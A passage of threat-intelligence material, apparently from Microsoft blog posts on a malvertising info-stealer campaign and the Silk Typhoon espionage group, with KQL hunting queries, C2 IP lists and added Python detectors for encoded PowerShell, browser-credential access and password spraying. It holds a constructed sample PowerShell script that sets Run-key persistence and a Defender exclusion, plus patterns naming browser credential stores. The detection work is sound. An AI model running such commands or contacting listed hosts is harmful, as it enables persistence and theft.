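    "Expand-Archive client.zip -DestinationPath WinLibraryClient\n"
    "Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
    "-Name Client -Value \"$env:APPDATA\\WinLibraryClient\\client32.exe\"\n"
    "Add-MpPreference -ExclusionPath $env:APPDATA\\WinLibraryClient\n"
)
# PowerShell expects the encoded command as Base64 of the UTF-16LE script bytes.
SAMPLE_CMDLINE = ("powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode())


def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_powershell(cmdline):
    """Decode the command line and report which indicators appear in it or in the decoded script."""
    script = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + (script or "")
    found = [name for name, pat in INDICATORS if pat.search(haystack)]
    return {"decoded": script, "indicators": found, "score": len(found)}


if __name__ == "__main__":
    result = triage_powershell(SAMPLE_CMDLINE)
    print("indicators:", ", ".join(result["indicators"]))
    print(result["decoded"])
```

Matching on the decoded script rather than the raw command line is the point: every indicator except the execution-policy switch is invisible until the Base64/UTF-16LE layer is removed, so a rule that only inspects the outer command line misses the download, the persistence and the Defender exclusion.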
Microsoft recommends the following mitigations to reduce the impact of this threat.
Strengthen Microsoft Defender for Endpoint configuration
- Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
- Enable network protection in Microsoft Defender for Endpoint.
- Turn on web protection.
- Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Microsoft Defender XDR customers can turn on the following attack surface reduction rules to prevent common attack techniques used by threat actors:
  - Block executable files from running unless they meet a prevalence, age, or trusted list criterion
  - Block execution of potentially obfuscated scripts
  - Block JavaScript or VBScript from launching downloaded executable content
  - Block process creations originating from PSExec and WMI commands
  - Block credential stealing from the Windows local security authority subsystem
  - Block use of copied or impersonated system tools
- Require multifactor authentication (MFA). While certain attacks such as adversary-in-the-middle (AiTM) phishing attempt to circumvent MFA, implementation of MFA remains an essential pillar in identity security and is highly effective at stopping a variety of threats.
- Leverage phishing-resistant authentication methods such as FIDO Tokens, or Microsoft Authenticator with passkey. Avoid telephony-based MFA methods to avoid risks associated with SIM-jacking.
- Implement Entra ID Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
- Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Enable Network Level Authentication for Remote Desktop Service connections.
- Enable Local Security Authority (LSA) protection to block credential stealing from the Windows local security authority subsystem.
- AppLocker can restrict specific software tools prohibited within the organization, such as reconnaissance, fingerprinting, and RMM tools, or grant access to only specific users.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects threat components as the following malware:
- Trojan:Win64/LummaStealer
- Trojan:Win32/Malgent
- Behavior:Win32/Eldorado
- Behavior:Win32/LuammaStealer
- Trojan:PowerShell/Powdow
- Trojan:Win64/Shaolaod
- Behavior:Win64/Shaolaod
The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.
- Possible theft of passwords and other sensitive web browser information
- Possible Lumma Stealer activity
- Renamed AutoIt tool
- Use of living-off-the-land binary to run malicious code
- Suspicious startup item creation
- Suspicious Scheduled Task Process Launched
- Suspicious DPAPI Activity
- Suspicious implant process from a known emerging threat
- Security software tampering
- Suspicious activity linked to a financially motivated threat actor detected
- Ransomware-linked threat actor detected
- A file or network connection related to a ransomware-linked emerging threat activity group detected
- Information stealing malware activity
- Possible NetSupport Manager activity
- Suspicious sequence of exploration activities
- Defender detection bypass
- Suspicious Location of Remote Management Software
- A process was injected with potentially malicious code
- Process hollowing detected
- Suspicious PowerShell download or encoded command execution
- Suspicious PowerShell command line
- Suspicious behavior by cmd.exe was observed
- Suspicious Security Software Discovery
- Suspicious discovery indicative of Virtualization/Sandbox Evasion
- A process was launched on a hidden desktop
- Monitored keystrokes
- Suspicious Process Discovery
- Suspicious Javascript process
- A suspicious file was observed
- Anomaly detected in ASEP registry
The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.
- Detected suspicious combination of HTA and PowerShell
- Suspicious PowerShell Activity Detected
- Traffic detected from IP addresses recommended for blocking
- Attempted communication with suspicious sinkholed domain
- Communication with suspicious domain identified by threat intelligence
- Detected obfuscated command line
- Detected suspicious named pipe communications
Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:
- Incident investigation
- Microsoft User analysis
- Threat actor profile
- Threat Intelligence 360 report based on MDTI article
- Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

- Storm-0408
- Agent Tesla credential theft malware
- Information stealers
- Lumma stealer
- Abuse of remote monitoring and management tools
- Malicious use of PowerShell
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following queries to find related activity in their networks:

Github-hosted first-stage payload certificate serial numbers

```kusto
let specificSerialNumbers = dynamic(["70093af339876742820d7941", "15042512e67e8275f3f7f36b", "5608cab7e2ce34d53abcbb73", "0fa27d2553f24da79d1cc6bd8773ee9a", "7a7bf2ae0cbc0f5500db2946", "30d6c83a715bddb32e7956fe52d6b352", "301385aa36fae635e74bb88e", "30013cbbb16a7fd3c57f82707fb99c32", "5d00264a6b804ae6b28d9b16", "3a9c76f8304f77bd271921d9982f1ab6", "01f2c6c363767056abd80e9c", "0b09c88c0c8d15bed51a9eb4440f4bb0"]);
union
(
    DeviceFileCertificateInfo
    | where CertificateSerialNumber in (specificSerialNumbers)
    | project DeviceName, CertificateSerialNumber, Signer, SHA1, IsSigned, Issuer, Timestamp
),
(
    DeviceTvmCertificateInfo
    | where SerialNumber in (specificSerialNumbers)
    | project DeviceId, SerialNumber, SignatureAlgorithm, Thumbprint, Path, IssueDate, ExpirationDate
)
```

Dropbox-hosted first-stage payload certificate serial number
Surface devices that may contain first-stage payloads hosted on Dropbox related to this activity. This query will search for the unique serial number of the known certificate related to this activity.
```kusto
let specificSerialNumbers = dynamic(["7a7bf2ae0cbc0f5500db2946"]);
union
(
    DeviceFileCertificateInfo
    | where CertificateSerialNumber in (specificSerialNumbers)
    | project DeviceName, CertificateSerialNumber, Signer, SHA1, IsSigned, Issuer, Timestamp
),
(
    DeviceTvmCertificateInfo
    | where SerialNumber in (specificSerialNumbers)
    | project DeviceId, SerialNumber, SignatureAlgorithm, Thumbprint, Path, IssueDate, ExpirationDate
)
```

Second-stage C2 IP addresses
Surface devices that may have communicated with second stage C2 IP addresses related to this activity.
```kusto
let ipAddressToSearch = dynamic(["159.100.18.192", "192.142.10.246", "79.133.46.35", "84.200.24.191", "84.200.24.26", "89.187.28.253", "185.92.181.1"]);
// ipAddressToSearch is a dynamic array, so membership is tested with in() rather than ==
union isfuzzy=true
(
    AzureDiagnostics
    | where identity_claim_ipaddr_s in (ipAddressToSearch) or conditions_sourceIP_s in (ipAddressToSearch) or CallerIPAddress in (ipAddressToSearch) or clientIP_s in (ipAddressToSearch) or clientIp_s in (ipAddressToSearch) or primaryIPv4Address_s in (ipAddressToSearch) or conditions_destinationIP_s in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "AzureDiagnostics", IPAddress = coalesce(identity_claim_ipaddr_s, conditions_sourceIP_s, CallerIPAddress, clientIP_s, clientIp_s, primaryIPv4Address_s, conditions_destinationIP_s), AdditionalInfo = tostring(AdditionalFields)
),
(
    IdentityQueryEvents
    | where IPAddress in (ipAddressToSearch) or DestinationIPAddress in (ipAddressToSearch)
    | project Timestamp, Table = "IdentityQueryEvents", IPAddress = coalesce(IPAddress, DestinationIPAddress), AdditionalInfo = Query
),
(
    AADSignInEventsBeta
    | where IPAddress in (ipAddressToSearch)
    | project Timestamp, Table = "AADSignInEventsBeta", IPAddress, AdditionalInfo = UserAgent
),
(
    Heartbeat
    | where ComputerIP in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "Heartbeat", IPAddress = ComputerIP, AdditionalInfo = OSName
),
(
    CloudAppEvents
    | where IPAddress in (ipAddressToSearch)
    | project Timestamp, Table = "CloudAppEvents", IPAddress, AdditionalInfo = UserAgent
),
(
    DeviceNetworkEvents
    | where LocalIP in (ipAddressToSearch) or RemoteIP in (ipAddressToSearch)
    | project Timestamp, Table = "DeviceNetworkEvents", IPAddress = coalesce(LocalIP, RemoteIP), AdditionalInfo = InitiatingProcessCommandLine
),
(
    AADUserRiskEvents
    | where IpAddress in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "AADUserRiskEvents", IPAddress = IpAddress, AdditionalInfo = RiskEventType
),
(
    AADNonInteractiveUserSignInLogs
    | where IPAddress in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "AADNonInteractiveUserSignInLogs", IPAddress, AdditionalInfo = UserAgent
),
(
    MicrosoftAzureBastionAuditLogs
    | where TargetVMIPAddress in (ipAddressToSearch) or ClientIpAddress in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "MicrosoftAzureBastionAuditLogs", IPAddress = coalesce(TargetVMIPAddress, ClientIpAddress), AdditionalInfo = UserAgent
)
| sort by Timestamp desc
```

Fourth-stage C2 IP addresses
Surface devices that may have communicated with fourth stage C2 IP addresses related to this activity.
```kusto
let ipAddressToSearch = dynamic(["45.141.84.60", "91.202.233.18", "154.216.20.131", "5.10.250.240", "79.132.128.77"]);
// ipAddressToSearch is a dynamic array, so membership is tested with in() rather than ==
union isfuzzy=true
(
    AzureDiagnostics
    | where identity_claim_ipaddr_s in (ipAddressToSearch) or conditions_sourceIP_s in (ipAddressToSearch) or CallerIPAddress in (ipAddressToSearch) or clientIP_s in (ipAddressToSearch) or clientIp_s in (ipAddressToSearch) or primaryIPv4Address_s in (ipAddressToSearch) or conditions_destinationIP_s in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "AzureDiagnostics", IPAddress = coalesce(identity_claim_ipaddr_s, conditions_sourceIP_s, CallerIPAddress, clientIP_s, clientIp_s, primaryIPv4Address_s, conditions_destinationIP_s), AdditionalInfo = tostring(AdditionalFields)
),
(
    IdentityQueryEvents
    | where IPAddress in (ipAddressToSearch) or DestinationIPAddress in (ipAddressToSearch)
    | project Timestamp, Table = "IdentityQueryEvents", IPAddress = coalesce(IPAddress, DestinationIPAddress), AdditionalInfo = Query
),
(
    AADSignInEventsBeta
    | where IPAddress in (ipAddressToSearch)
    | project Timestamp, Table = "AADSignInEventsBeta", IPAddress, AdditionalInfo = UserAgent
),
(
    Heartbeat
    | where ComputerIP in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "Heartbeat", IPAddress = ComputerIP, AdditionalInfo = OSName
),
(
    CloudAppEvents
    | where IPAddress in (ipAddressToSearch)
    | project Timestamp, Table = "CloudAppEvents", IPAddress, AdditionalInfo = UserAgent
),
(
    DeviceNetworkEvents
    | where LocalIP in (ipAddressToSearch) or RemoteIP in (ipAddressToSearch)
    | project Timestamp, Table = "DeviceNetworkEvents", IPAddress = coalesce(LocalIP, RemoteIP), AdditionalInfo = InitiatingProcessCommandLine
),
(
    AADUserRiskEvents
    | where IpAddress in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "AADUserRiskEvents", IPAddress = IpAddress, AdditionalInfo = RiskEventType
),
(
    AADNonInteractiveUserSignInLogs
    | where IPAddress in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "AADNonInteractiveUserSignInLogs", IPAddress, AdditionalInfo = UserAgent
),
(
    MicrosoftAzureBastionAuditLogs
    | where TargetVMIPAddress in (ipAddressToSearch) or ClientIpAddress in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "MicrosoftAzureBastionAuditLogs", IPAddress = coalesce(TargetVMIPAddress, ClientIpAddress), AdditionalInfo = UserAgent
)
| sort by Timestamp desc
```

Browser remote debugging
Identify AutoIT scripts launching chromium-based browsers (such as chrome.exe, msedge.exe, brave.exe) in remote debugging mode.
```kusto
DeviceProcessEvents
// Check for AutoIt scripts, even if the interpreter has been renamed.
| where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe"
// Identify Chromium-based browsers (chrome.exe, msedge.exe, brave.exe, etc.) being launched in remote debugging mode.
| where ProcessCommandLine has "--remote-debugging-port"
| project DeviceId, Timestamp, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine
```

DPAPI decryption via AutoIT
Identify DPAPI decryption activity originating from AutoIT scripts.
```kusto
DeviceEvents
| where ActionType == "DpapiAccessed"
| where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe"
| where (AdditionalFields has_any("Google Chrome", "Microsoft Edge") and AdditionalFields has_any("SPCryptUnprotect"))
| extend json = parse_json(AdditionalFields)
| extend dataDesp = tostring(json.DataDescription.PropertyValue)
| extend opType = tostring(json.OperationType.PropertyValue)
| where (dataDesp in~ ("Google Chrome", "Microsoft Edge") and opType =~ "SPCryptUnprotect")
| project Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType
```

DPAPI decryption via LOLBAS binaries
Identify DPAPI decryption activity originating from LOLBAS binaries (RegAsm.exe and MSBuild.exe).
```kusto
DeviceEvents
| where ActionType == "DpapiAccessed"
| where InitiatingProcessFileName has_any ("RegAsm.exe", "MSBuild.exe")
| where (AdditionalFields has_any("Google Chrome", "Microsoft Edge") and AdditionalFields has_any("SPCryptUnprotect"))
| extend json = parse_json(AdditionalFields)
| extend dataDesp = tostring(json.DataDescription.PropertyValue)
| extend opType = tostring(json.OperationType.PropertyValue)
| where (dataDesp in~ ("Google Chrome", "Microsoft Edge") and opType =~ "SPCryptUnprotect")
| project Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType
```

Sensitive browser file access via AutoIT
Identify AutoIT scripts (renamed or otherwise) accessing sensitive browser files.
```kusto
let browserDirs = pack_array(@"\Google\Chrome\User Data\", @"\Microsoft\Edge\User Data\", @"\Mozilla\Firefox\Profiles\");
let browserSensitiveFiles = pack_array("Web Data", "Login Data", "key4.db", "formhistory.sqlite", "cookies.sqlite", "logins.json", "places.sqlite", "cert9.db");
DeviceEvents
// Filter for "File Open" events.
| where AdditionalFields has_any ("FileOpenSource")
| where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe"
| where (AdditionalFields has_any(browserDirs) or AdditionalFields has_any(browserSensitiveFiles))
| extend json = parse_json(AdditionalFields)
| extend File_Name = tostring(json.FileName.PropertyValue)
| where (File_Name has_any (browserDirs) and File_Name has_any (browserSensitiveFiles))
| project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, File_Name
```

Sensitive browser file access via LOLBAS binaries
Identify LOLBAS binaries (RegAsm.exe and MSBuild.exe) accessing sensitive browser files.
```kusto
let browserDirs = pack_array(@"\Google\Chrome\User Data\", @"\Microsoft\Edge\User Data\", @"\Mozilla\Firefox\Profiles\");
let browserSensitiveFiles = pack_array("Web Data", "Login Data", "key4.db", "formhistory.sqlite", "cookies.sqlite", "logins.json", "places.sqlite", "cert9.db");
DeviceEvents
// Filter for "File Open" events.
| where AdditionalFields has_any ("FileOpenSource")
| where InitiatingProcessFileName has_any ("RegAsm.exe", "MSBuild.exe")
| where (AdditionalFields has_any(browserDirs) or AdditionalFields has_any(browserSensitiveFiles))
| extend json = parse_json(AdditionalFields)
| extend File_Name = tostring(json.FileName.PropertyValue)
| where (File_Name has_any (browserDirs) and File_Name has_any (browserSensitiveFiles))
| project Timestamp, ReportId, DeviceId, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, File_Name
```

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
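As an added example (not code from the Microsoft post), the following Python re-implements the DPAPI-decryption and sensitive-browser-file rules from the AutoIT and LOLBAS queries above so the logic can be checked offline against exported DeviceEvents rows; the field names follow the query columns, while the sample rows, the `_row` helper and the rule names are constructed for illustration.

```python
"""Offline check of two hunting rules: DPAPI decryption of Chrome/Edge secrets
and opening of sensitive browser files, when initiated by AutoIt (even if the
interpreter was renamed) or by the LOLBAS binaries RegAsm.exe / MSBuild.exe.
Input rows are dicts keyed like Defender DeviceEvents columns; the sample
rows at the bottom are constructed, not real telemetry."""
import json
from typing import Optional

AUTOIT_INTERNAL_NAME = "AutoIt3.exe"           # PE internal name survives renaming
LOLBAS_BINARIES = {"regasm.exe", "msbuild.exe"}
BROWSER_DATA_DESCRIPTIONS = {"google chrome", "microsoft edge"}
# Same directory and file lists as the KQL, lower-cased for case-insensitive matching
BROWSER_DIRS = ("\\google\\chrome\\user data\\",
                "\\microsoft\\edge\\user data\\",
                "\\mozilla\\firefox\\profiles\\")
SENSITIVE_FILES = ("web data", "login data", "key4.db", "formhistory.sqlite",
                   "cookies.sqlite", "logins.json", "places.sqlite", "cert9.db")


def _initiator_kind(event: dict) -> Optional[str]:
    """'autoit' or 'lolbas' when the initiating process is one the rules key on."""
    if event.get("InitiatingProcessVersionInfoInternalFileName") == AUTOIT_INTERNAL_NAME:
        return "autoit"
    if str(event.get("InitiatingProcessFileName", "")).lower() in LOLBAS_BINARIES:
        return "lolbas"
    return None


def _additional_fields(event: dict) -> dict:
    """AdditionalFields is a JSON string in DeviceEvents; tolerate malformed rows."""
    try:
        parsed = json.loads(event.get("AdditionalFields") or "{}")
    except json.JSONDecodeError:
        return {}
    return parsed if isinstance(parsed, dict) else {}


def _property(fields: dict, name: str) -> str:
    """Mirror tostring(json.<name>.PropertyValue) from the KQL."""
    value = fields.get(name)
    if isinstance(value, dict):
        value = value.get("PropertyValue", "")
    return "" if value is None else str(value)


def match_dpapi_decrypt(event: dict) -> Optional[str]:
    """Rule 1: SPCryptUnprotect of Chrome/Edge data by AutoIt or a LOLBAS binary."""
    if event.get("ActionType") != "DpapiAccessed":
        return None
    kind = _initiator_kind(event)
    if kind is None:
        return None
    fields = _additional_fields(event)
    data_desc = _property(fields, "DataDescription").lower()
    op_type = _property(fields, "OperationType").lower()
    if data_desc in BROWSER_DATA_DESCRIPTIONS and op_type == "spcryptunprotect":
        return f"dpapi_decrypt_{kind}"
    return None


def match_browser_file_access(event: dict) -> Optional[str]:
    """Rule 2: file-open of a credential/cookie store inside a browser profile."""
    kind = _initiator_kind(event)
    if kind is None:
        return None
    fields = _additional_fields(event)
    if "FileOpenSource" not in fields:         # only file-open events carry this key
        return None
    path = _property(fields, "FileName").lower()
    if any(d in path for d in BROWSER_DIRS) and any(f in path for f in SENSITIVE_FILES):
        return f"browser_file_access_{kind}"
    return None


def hunt(events) -> list:
    """Return (ReportId, rule name) for every row that trips either rule."""
    hits = []
    for event in events:
        for rule in (match_dpapi_decrypt, match_browser_file_access):
            name = rule(event)
            if name:
                hits.append((event.get("ReportId"), name))
    return hits


def _row(report_id, action, init_file, internal_name, fields) -> dict:
    """Build a constructed DeviceEvents-like row (AdditionalFields serialised as JSON)."""
    return {"ReportId": report_id, "ActionType": action,
            "InitiatingProcessFileName": init_file,
            "InitiatingProcessVersionInfoInternalFileName": internal_name,
            "AdditionalFields": json.dumps(fields)}


SAMPLE_EVENTS = [
    # renamed AutoIt interpreter unprotecting Chrome's DPAPI-wrapped key -> hit
    _row(1, "DpapiAccessed", "updater.exe", "AutoIt3.exe",
         {"DataDescription": {"PropertyValue": "Google Chrome"},
          "OperationType": {"PropertyValue": "SPCryptUnprotect"}}),
    # MSBuild.exe opening the Edge credential store -> hit (ActionType unused by rule 2)
    _row(2, None, "MSBuild.exe", "MSBuild.exe",
         {"FileOpenSource": {"PropertyValue": "constructed"},
          "FileName": {"PropertyValue":
                       "C:\\Users\\alice\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data"}}),
    # the browser itself decrypting its own data -> benign, no hit
    _row(3, "DpapiAccessed", "chrome.exe", "chrome.exe",
         {"DataDescription": {"PropertyValue": "Google Chrome"},
          "OperationType": {"PropertyValue": "SPCryptUnprotect"}}),
    # AutoIt touching a non-sensitive file in the profile directory -> no hit
    _row(4, None, "AutoIt3.exe", "AutoIt3.exe",
         {"FileOpenSource": {"PropertyValue": "constructed"},
          "FileName": {"PropertyValue":
                       "C:\\Users\\alice\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences"}}),
]

if __name__ == "__main__":
    for report_id, rule in hunt(SAMPLE_EVENTS):
        print(f"ReportId={report_id} matched {rule}")
```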
Indicators of compromise
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.
Hear more about this discovery and how threat actors in this campaign leverage trusted platforms and advanced techniques to achieve their malicious goals in this episode of the Microsoft Threat Intelligence podcast, hosted by Sherrod DeGrippo: https://thecyberwire.com/podcasts/microsoft-threat-intelligence/39/notes. To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.
The post Malvertising campaign leads to info stealers hosted on GitHub appeared first on Microsoft Security Blog.
Silk Typhoon targeting IT supply chain
Executive summary:
Microsoft Threat Intelligence identified a shift in tactics by Silk Typhoon, a Chinese espionage group, now targeting common IT solutions like remote management tools and cloud applications to gain initial access. While they haven’t been observed directly targeting Microsoft cloud services, they do exploit unpatched applications that allow them to elevate their access in targeted organizations and conduct further malicious activities. After successfully compromising a victim, Silk Typhoon uses the stolen keys and credentials to infiltrate customer networks where they can then abuse a variety of deployed applications, including Microsoft services and others, to achieve their espionage objectives. Our latest blog explains how Microsoft security solutions detect these threats and offers mitigation guidance, aiming to raise awareness and strengthen defenses against Silk Typhoon’s activities.
Silk Typhoon is an espionage-focused Chinese state actor whose activities indicate that they are a well-resourced and technically efficient group with the ability to quickly operationalize exploits for discovered zero-day vulnerabilities in edge devices. This threat actor holds one of the largest targeting footprints among Chinese threat actors. Part of this is due to their opportunistic nature of acting on discoveries from vulnerability scanning operations, moving quickly to the exploitation phase once they discover a vulnerable public-facing device that they could exploit.
As a result, Silk Typhoon has been observed targeting a wide range of sectors and geographic regions, including but not limited to information technology (IT) services and infrastructure, remote monitoring and management (RMM) companies, managed service providers (MSPs) and affiliates, healthcare, legal services, higher education, defense, government, non-governmental organizations (NGOs), energy, and others located in the United States and throughout the world.
Silk Typhoon has shown proficiency in understanding how cloud environments are deployed and configured, allowing them to successfully move laterally, maintain persistence, and exfiltrate data quickly within victim environments. Since Microsoft Threat Intelligence began tracking this threat actor in 2020, Silk Typhoon has used a myriad of web shells that allow them to execute commands, maintain persistence, and exfiltrate data from victim environments.
As with any observed nation-state threat actor activity, Microsoft has directly notified targeted or compromised customers, providing them with important information needed to secure their environments. We’re publishing this blog to raise awareness of Silk Typhoon’s recent and long-standing malicious activities, provide mitigation and hunting guidance, and help disrupt operations by this threat actor.
Recent Silk Typhoon activity
Supply chain compromise
Since late 2024, Microsoft Threat Intelligence has conducted thorough research and tracked ongoing attacks performed by Silk Typhoon. These efforts have significantly enhanced our understanding of the actor’s operations and uncovered new tradecraft used by the actor. In particular, Silk Typhoon was observed abusing stolen API keys and credentials associated with privileged access management (PAM), cloud app providers, and cloud data management companies, allowing the threat actor to access these companies’ downstream customer environments. Companies within these sectors are possible targets of interest to the threat actor. The following was observed once Silk Typhoon had successfully stolen an API key:
- Silk Typhoon used stolen API keys to access downstream customers/tenants of the initially compromised company.
- Leveraging access obtained via the API key, the actor performed reconnaissance and data collection on targeted devices via an admin account. Data of interest overlaps with China-based interests, US government policy and administration, and legal process and documents related to law enforcement investigations.
- Additional tradecraft identified included resetting the default admin account via the API key, web shell implants, creation of additional users, and clearing logs of actor-performed actions.
- Thus far the victims of this downstream activity were largely in the state and local government, and the IT sector.
Silk Typhoon has also gained initial access through successful password spray attacks and other password abuse techniques, including discovering passwords through reconnaissance. In this reconnaissance activity, Silk Typhoon leveraged leaked corporate passwords on public repositories, such as GitHub, and were successfully authenticated to the corporate account. This demonstrates the level of effort that the threat actor puts into their research and reconnaissance to collect victim information and highlights the importance of password hygiene and the use of multifactor authentication (MFA) on all accounts.
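The password spray technique described above leaves a recognizable shape in sign-in logs: many distinct accounts, one or two failures each, from one source, all inside a short window, which is exactly what per-account lockout counters miss. The detector below is an added example written for this post, not Microsoft's detection logic (the Sentinel "Sign-in password spray" query is separate). It assumes a simplified one-line-per-sign-in format (`timestamp src= user= result=`); every record is constructed, with addresses from the RFC 5737 documentation ranges.

```python
"""Password-spray detection over sign-in records.

A spray tries a few common passwords against many accounts from the same
source, staying under per-account lockout thresholds. The detector groups
failed sign-ins by source address, slides a time window over them and flags a
source that touches many distinct accounts with few attempts each; a later
success from that source against a sprayed account is reported as a probable
credential compromise. Schema and records are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>success|failure)$"
)


def parse_signin(line: str) -> dict:
    """Parse one constructed sign-in line into a record."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable sign-in line: {line!r}")
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "src": m["src"],
        "user": m["user"],
        "ok": m["result"] == "success",
    }


def detect_password_spray(lines, window=timedelta(minutes=10), min_accounts=8, max_per_account=3.0):
    """Return one finding per source whose failures look like a spray.

    A source is flagged when, within `window`, its failed sign-ins cover at least
    `min_accounts` distinct accounts with on average no more than `max_per_account`
    attempts per account (the low-and-slow signature).
    """
    events = sorted((parse_signin(ln) for ln in lines), key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    findings = []
    for src, evs in by_src.items():
        failures = [e for e in evs if not e["ok"]]
        best, lo = None, 0
        for hi in range(len(failures)):
            # Advance the left edge so failures[lo..hi] fits inside `window`.
            while failures[hi]["ts"] - failures[lo]["ts"] > window:
                lo += 1
            chunk = failures[lo:hi + 1]
            users = {e["user"] for e in chunk}
            if len(users) >= min_accounts and len(chunk) / len(users) <= max_per_account:
                if best is None or len(users) > len(best["accounts"]):
                    best = {"source": src, "accounts": sorted(users), "failures": len(chunk),
                            "window_start": chunk[0]["ts"], "window_end": chunk[-1]["ts"]}
        if best is None:
            continue
        sprayed = set(best["accounts"])
        # A success from the same source against a sprayed account, at or after the
        # spray began, is the case that needs an immediate reset and MFA check.
        best["compromised"] = sorted({e["user"] for e in evs
                                      if e["ok"] and e["user"] in sprayed and e["ts"] >= best["window_start"]})
        findings.append(best)
    return findings


# Constructed sample: a 12-account spray from 203.0.113.5 that lands on user07,
# one user mistyping their own password three times, and an unrelated success.
_T0 = datetime(2025, 2, 1, 10, 0, 0)


def _line(ts, src, user, result):
    return f"{ts:%Y-%m-%dT%H:%M:%SZ} src={src} user={user} result={result}"


SAMPLE_LINES = (
    [_line(_T0 + timedelta(seconds=20 * i), "203.0.113.5", f"user{i + 1:02d}", "failure") for i in range(12)]
    + [_line(_T0 + timedelta(minutes=5), "203.0.113.5", "user07", "success")]
    + [_line(datetime(2025, 2, 1, 9, 50 + k), "198.51.100.7", "alice", "failure") for k in range(3)]
    + [_line(datetime(2025, 2, 1, 9, 53), "198.51.100.7", "alice", "success"),
       _line(datetime(2025, 2, 1, 11, 0), "192.0.2.9", "bob", "success")]
)

if __name__ == "__main__":
    for f in detect_password_spray(SAMPLE_LINES):
        print(f"{f['source']}: {len(f['accounts'])} accounts, {f['failures']} failures, "
              f"{f['window_start']:%H:%M:%S}-{f['window_end']:%H:%M:%S}, compromised={f['compromised']}")
```

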